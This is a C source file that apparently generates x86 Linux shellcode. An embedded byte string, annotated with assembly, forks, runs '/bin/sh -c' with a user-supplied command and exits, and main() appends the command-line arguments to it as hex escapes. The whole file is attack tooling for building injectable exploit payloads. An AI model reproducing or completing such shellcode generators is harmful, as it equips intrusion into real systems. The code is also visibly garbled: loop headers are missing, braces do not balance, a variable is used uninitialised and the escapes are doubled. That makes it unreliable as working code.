#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char code[] =
"\\x60" /* pusha */
"\\xb8\\x02\\x00\\x00\\x00" /* mov $0x2,%eax */
"\\xcd\\x80" /* int $0x80 */
"\\x83\\xf8\\x00" /* cmp $0x0,%eax */
"\\x74\\x02" /* je 8048383 <execve> */
"\\xeb\\x24" /* jmp 80483a7 <end> */
"\\xb8\\x0b\\x00\\x00\\x00" /* mov $0xb,%eax */
"\\x6a\\x00" /* push $0x0 */
"\\xeb\\x59" /* jmp 80483e5 <cmd> */
"\\xeb\\x4f" /* jmp 80483dd <arg1> */
"\\xeb\\x40" /* jmp 80483d0 <arg2> */
"\\x5b" /* pop %ebx */
"\\x53" /* push %ebx */
"\\x89\\xe1" /* mov %esp,%ecx */
"\\xba\\x00\\x00\\x00\\x00" /* mov $0x0,%edx */
"\\xcd\\x80" /* int $0x80 */
"\\xb8\\x01\\x00\\x00\\x00" /* mov $0x1,%eax */
"\\xbb\\x00\\x00\\x00\\x00" /* mov $0x0,%ebx */
"\\xcd\\x80" /* int $0x80 */
"\\xb8\\x07\\x00\\x00\\x00" /* mov $0x7,%eax */
"\\xbb\\xff\\xff\\xff\\xff" /* mov $0xffffffff,%ebx */
"\\xbe\\x00\\x00\\x00\\x00" /* mov $0x0,%esi */
"\\x56" /* push %esi */
"\\x89\\xe1" /* mov %esp,%ecx */
"\\xba\\x00\\x00\\x00\\x00" /* mov $0x0,%edx */
"\\xcd\\x80" /* int $0x80 */
"\\x83\\xc4\\x04" /* add $0x4,%esp */
"\\x61" /* popa */
"\\xb8\\x01\\x00\\x00\\x00" /* mov $0x1,%eax */
"\\xbb\\x00\\x00\\x00\\x00" /* mov $0x0,%ebx */
"\\xcd\\x80" /* int $0x80 */
"\\xe8\\xbb\\xff\\xff\\xff" /* call 8048390 <l3> */
"\\x2f\\x62\\x69\\x6e\\x2f"
"\\x73\\x68\\x00" /* /bin/sh */
"\\xe8\\xac\\xff\\xff\\xff" /* call 804838e <l2> */
"\\x2d\\x63\\x00" /* sub $0xa2e80063,%eax */
"\\xe8\\xa2\\xff\\xff\\xff" /* call 804838c <l1> */;
int main (int argc, char **argv) {
int i,len=0;
char *shell,*cmd;
if (!argv[1])
exit(1);
len += strlen(argv[i]);
len += argc;
cmd = (char*) malloc(len);
strcat (cmd,argv[i]);
strcat (cmd,"\x20");
}
cmd[strlen(cmd)-1]=0;
shell = (char*) malloc( sizeof(code) + (strlen(argv[1]))*5 + 1 );
memcpy (shell,code,sizeof(code));
for (i=0; i<strlen(cmd); i++)
sprintf (shell,"%s\\x%.2x",shell,cmd[i]);
}